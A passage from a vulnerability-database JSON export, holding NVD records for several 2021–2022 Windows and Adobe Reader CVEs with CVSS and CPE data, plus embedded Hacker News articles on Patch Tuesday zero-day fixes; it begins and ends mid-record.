"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2"], "id": "CVE-2021-31201", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31201", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:35:39", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. 
Exploitation of this issue requires user interaction in that a victim must open a malicious file.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-02T17:15:00", "type": "cve", "title": "CVE-2021-28550", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-15T13:55:00", "cpe": ["cpe:/a:adobe:acrobat_reader:17.011.30194", "cpe:/a:adobe:acrobat:20.001.30020", "cpe:/a:adobe:acrobat_reader:20.001.30020", "cpe:/a:adobe:acrobat_reader_dc:21.001.20150", "cpe:/a:adobe:acrobat_dc:21.001.20150", "cpe:/a:adobe:acrobat:17.011.30194"], "id": "CVE-2021-28550", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat:17.011.30194:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:20.001.30020:*:*:*:classic:*:*:*", "cpe:2.3:a:adobe:acrobat_dc:21.001.20150:*:*:*:continuous:*:*:*", "cpe:2.3:a:adobe:acrobat:20.001.30020:*:*:*:classic:*:*:*", 
"cpe:2.3:a:adobe:acrobat_reader_dc:21.001.20150:*:*:*:continuous:*:*:*"]}, {"lastseen": "2023-05-23T15:35:39", "description": "Windows Update Medic Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T18:15:00", "type": "cve", "title": "CVE-2021-36948", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-20T18:58:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004"], "id": "CVE-2021-36948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:44:04", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T23:15:00", "type": "cve", "title": "CVE-2022-22047", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-05-17T17:15:00", "cpe": ["cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1809", 
"cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-22047", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*"]}], "thn": [{"lastseen": "2022-05-09T12:37:59", "description": "[](<https://thehackernews.com/images/-Oinzu8T6SmI/YMBZ7WkhbJI/AAAAAAAACzI/kVA4Ura4Yl4MrNb_jPNPBtgjkBj1DSs1wCLcBGAsYHQ/s0/microsoft-windows-update.jpg>)\n\nMicrosoft on Tuesday released another round of [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jun>) for Windows operating system and other supported software, squashing 50 vulnerabilities, including six zero-days that are said to be under active attack.\n\nThe flaws were identified and resolved in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code - Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nOf these 50 bugs, five are rated Critical, and 45 are rated Important in severity, with three of the issues publicly known at the time of release. 
The vulnerabilities that are being actively exploited are listed below -\n\n * [**CVE-2021-33742**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) (CVSS score: 7.5) - Windows MSHTML Platform Remote Code Execution Vulnerability\n * [**CVE-2021-33739**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) (CVSS score: 8.4) - Microsoft DWM Core Library Elevation of Privilege Vulnerability\n * [**CVE-2021-31199**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31201**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) (CVSS score: 5.2) - Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n * [**CVE-2021-31955**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) (CVSS score: 5.5) - Windows Kernel Information Disclosure Vulnerability\n * [**CVE-2021-31956**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) (CVSS score: 7.8) - Windows NTFS Elevation of Privilege Vulnerability\n\nMicrosoft didn't disclose the nature of the attacks, how widespread they are, or the identities of the threat actors exploiting them. 
But the fact that four of the six flaws are privilege escalation vulnerabilities suggests that attackers could be leveraging them as part of an infection chain to gain elevated permissions on the targeted systems to execute malicious code or leak sensitive information.\n\nThe Windows maker also noted that both CVE-2021-31201 and CVE-2021-31199 address flaws related to [CVE-2021-28550](<https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html>), an arbitrary code execution vulnerability rectified by Adobe last month that it said was being \"exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\"\n\nGoogle's Threat Analysis Group, which has been acknowledged as having reported CVE-2021-33742 to Microsoft, [said](<https://twitter.com/ShaneHuntley/status/1402320072123719690>) \"this seem[s] to be a commercial exploit company providing capability for limited nation state Eastern Europe / Middle East targeting.\"\n\nRussian cybersecurity firm Kaspersky, for its part, detailed that CVE-2021-31955 and CVE-2021-31956 were abused in a Chrome zero-day exploit chain ([CVE-2021-21224](<https://thehackernews.com/2021/04/update-your-chrome-browser-immediately.html>)) in a series of highly targeted attacks against multiple companies on April 14 and 15. 
The intrusions were attributed to a new threat actor dubbed \"PuzzleMaker.\"\n\n\"While we were not able to retrieve the exploit used for remote code execution (RCE) in the Chrome web browser, we were able to find and analyze an elevation of privilege (EoP) exploit that was used to escape the sandbox and obtain system privileges,\" Kaspersky Lab researchers [said](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>).\n\nElsewhere, Microsoft fixed numerous remote code execution vulnerabilities spanning Paint 3D, Microsoft SharePoint Server, Microsoft Outlook, Microsoft Office Graphics, Microsoft Intune Management Extension, Microsoft Excel, and Microsoft Defender, as well as several privilege escalation flaws in Microsoft Edge, Windows Filter Manager, Windows Kernel, Windows Kernel-Mode Driver, Windows NTLM Elevation, and Windows Print Spooler.\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nAlongside Microsoft, a number of other vendors have also released a slew of patches on Tuesday, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-06-01>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [Intel](<https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-June/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=578125999>) (with cybersecurity firm Onapsis 
[credited](<https://onapsis.com/blog/sap-security-patch-day-june-2021-multiple-memory-corruption-vulnerabilities-can-lead-system>) with identifying 20 of the 40 remediated flaws)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>), and\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-09T06:07:00", "type": "thn", "title": "Update Your Windows Computers to Patch 6 New In-the-Wild Zero-Day Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-09T16:52:54", "id": "THN:1DDE95EA33D4D9F304973569FC787451", "href": 
"https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:03", "description": "[](<https://thehackernews.com/images/-pHacbifc0bM/YJtLaUVqNrI/AAAAAAAAChE/JQZWUxanHVEGGJy94zJWtnW3s6teGne7ACLcBGAsYHQ/s0/adobe.jpg>)\n\nAdobe has released [Patch Tuesday updates](<https://helpx.adobe.com/security.html>) for the month of May with fixes for multiple vulnerabilities spanning 12 different products, including a zero-day flaw affecting Adobe Reader that's actively exploited in the wild.\n\nThe list of updated applications includes [Adobe Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb21-15.html>), [Adobe InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), [Adobe Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>), Adobe Acrobat and Reader, [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>), Adobe [Creative Cloud Desktop](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>) Application, Adobe [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), Adobe [After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), Adobe Medium, and Adobe Animate.\n\nIn a security bulletin, the company [acknowledged](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) it received reports that the flaw \"has been exploited in the wild in limited attacks targeting Adobe Reader users on Windows.\" Tracked as CVE-2021-28550, the zero-day concerns an arbitrary code execution flaw that could allow adversaries to execute virtually any command on target 
systems.\n\n[](<https://thehackernews.com/images/-bGxPAhAwfTI/YJtpVB2NOSI/AAAAAAAAChM/kjgbRzSnNbkEbGKd5h6QkhcEM_bQMjrdgCLcBGAsYHQ/s0/adobe.jpg>)\n\nWhile the targeted attacks took aim at Windows users of Adobe Reader, the issue affects both Windows and macOS versions of Acrobat DC, Acrobat Reader DC, Acrobat 2020, Acrobat Reader 2020, Acrobat 2017, and Acrobat Reader 2017. An anonymous researcher has been credited with reporting the vulnerability.\n\n10 critical and four important vulnerabilities were addressed in Adobe Acrobat and Reader, followed by remediation for five critical flaws (CVE-2021-21101-CVE-2021-21105) in Adobe Illustrator that could lead to arbitrary code execution in the context of the current user. Adobe credited Kushal Arvind Shah of Fortinet's FortiGuard Labs with reporting three of the five vulnerabilities.\n\nIn all, a total of 43 security weaknesses have been resolved in Tuesday's update. Users are advised to update their software installations to the latest versions to mitigate the risk associated with the flaws.\n", 
"cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-12T05:41:00", "type": "thn", "title": "Alert: Hackers Exploit Adobe Reader 0-Day Vulnerability in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21101", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-12T06:42:13", "id": "THN:8243BE07E124CAD984B8B4895550A7CC", "href": "https://thehackernews.com/2021/05/alert-hackers-exploit-adobe-reader-0.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-KFVbzvrTdtw/YRNbSwawxnI/AAAAAAAADfg/bEuoCVHmHHw4ycTXfnhAqcyuUoWDf2W7gCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Aug>) to address a total of 44 security issues affecting its 
software products and services, one of which it says is an actively exploited zero-day in the wild.\n\nThe update, which is the smallest release since December 2019, squashes seven Critical and 37 Important bugs in Windows, .NET Core & Visual Studio, Azure, Microsoft Graphics Component, Microsoft Office, Microsoft Scripting Engine, Microsoft Windows Codecs Library, Remote Desktop Client, among others. This is in addition to [seven security flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) it patched in the Microsoft Edge browser on August 5.\n\nChief among the patched issues is [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) (CVSS score: 7.8), an elevation of privilege flaw affecting Windows Update Medic Service \u2014 a service that enables remediation and protection of Windows Update components \u2014 which could be abused to run malicious programs with escalated permissions.\n\nMicrosoft's Threat Intelligence Center has been credited with reporting the flaw, although the company refrained from sharing additional specifics or detail on how widespread those attacks were in light of active exploitation attempts.\n\nTwo of the security vulnerabilities are publicly known at the time of release -\n\n * [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) (CVSS score: 9.8) - Windows LSA Spoofing Vulnerability\n * [CVE-2021-36936](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36936>) (CVSS score: 8.8) - Windows Print Spooler Remote Code Execution Vulnerability\n\nWhile CVE-2021-36942 contains fixes to secure systems against NTLM relay attacks like [PetitPotam](<https://thehackernews.com/2021/07/new-petitpotam-ntlm-relay-attack-lets.html>) by blocking the LSARPC interface, CVE-2021-36936 resolves yet another remote code execution flaw in the Windows Print Spooler component.\n\n\"An unauthenticated attacker could call a method on the LSARPC 
interface and coerce the domain controller to authenticate against another server using NTLM,\" Microsoft said in its advisory for CVE-2021-36942, adding that the \"security update blocks the affected API calls OpenEncryptedFileRawA and OpenEncryptedFileRawW through LSARPC interface.\"\n\nCVE-2021-36936 is also one of the three flaws in the Print Spooler service that Microsoft has fixed this month, with the two other vulnerabilities being [CVE-2021-36947](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36947>) (CVSS score: 8.2) and [CVE-2021-34483](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34483>) (CVSS score: 7.8), the latter of which concerns an elevation of privilege vulnerability.\n\nIn addition, Microsoft has released [security updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to resolve a previously disclosed remote code execution flaw in the Print Spooler service tracked as [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) (CVSS score: 8.8). This changes the default behavior of the \"[Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>)\" feature, effectively preventing non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAnother critical flaw remediated as part of Patch Tuesday updates is [CVE-2021-26424](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26424>) (CVSS score: 9.9), a remote code execution vulnerability in Windows TCP/IP, which Microsoft notes \"is remotely triggerable by a malicious Hyper-V guest sending an ipv6 ping to the Hyper-V host. 
An attacker could send a specially crafted TCP/IP packet to its host utilizing the TCP/IP Protocol Stack (tcpip.sys) to process packets.\"\n\nTo install the latest security updates, Windows users can head to Start > Settings > Update & Security > Windows Update or by selecting Check for Windows updates.\n\n### Software Patches From Other Vendors\n\nBesides Microsoft, patches have also been released by a number of other vendors to address several vulnerabilities, including -\n\n * [Adobe](<https://helpx.adobe.com/security.html/security/security-bulletin.ug.html>)\n * [Android](<https://source.android.com/security/bulletin/2021-08-01>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Juniper Networks](<https://kb.juniper.net/InfoCenter/index?page=content&channel=SECURITY_ADVISORIES>)\n * Linux distributions [SUSE](<https://lists.suse.com/pipermail/sle-security-updates/2021-August/thread.html>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21>), and [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=2&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=Errata>)\n * [SAP](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=582222806>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/overview.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T05:31:00", "type": "thn", "title": "Microsoft Releases Windows Updates to Patch Actively Exploited Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2021-08-11T05:31:39", "id": "THN:F601EBBE359B3547B8E79F0217562FEF", "href": "https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T05:57:21", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhMMVV60incjQemAA8K9lAWSescsqjqG2a3UdVc4GiCMmXBd6175xW7cZiTJONSGUB1N9s-MMZARqaZP7h-OdKy4jUdvvT_H-aPCCLF9TKLu1S1Xcj8NZh673Hir7VOwNMNdOLjEU6LSXewzYkJXyX0Y0dpIn7L1WK7IuD61f1iG8uajyHoBwST8KVh/s728-e100/windows-update.jpg>)\n\nMicrosoft released its monthly round of Patch Tuesday updates to address [84 new security flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>) spanning multiple product categories, counting a zero-day vulnerability that's under active attack in the wild.\n\nOf the 84 shortcomings, four are rated Critical, and 80 are rated Important in severity. Also separately resolved by the tech giant are [two other bugs](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in the Chromium-based Edge browser, one of which plugs another [zero-day flaw](<https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html>) that Google disclosed as being actively exploited in real-world attacks.\n\nTop of the list of this month's updates is [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>) (CVSS score: 7.8), a case of privilege escalation in the Windows Client Server Runtime Subsystem 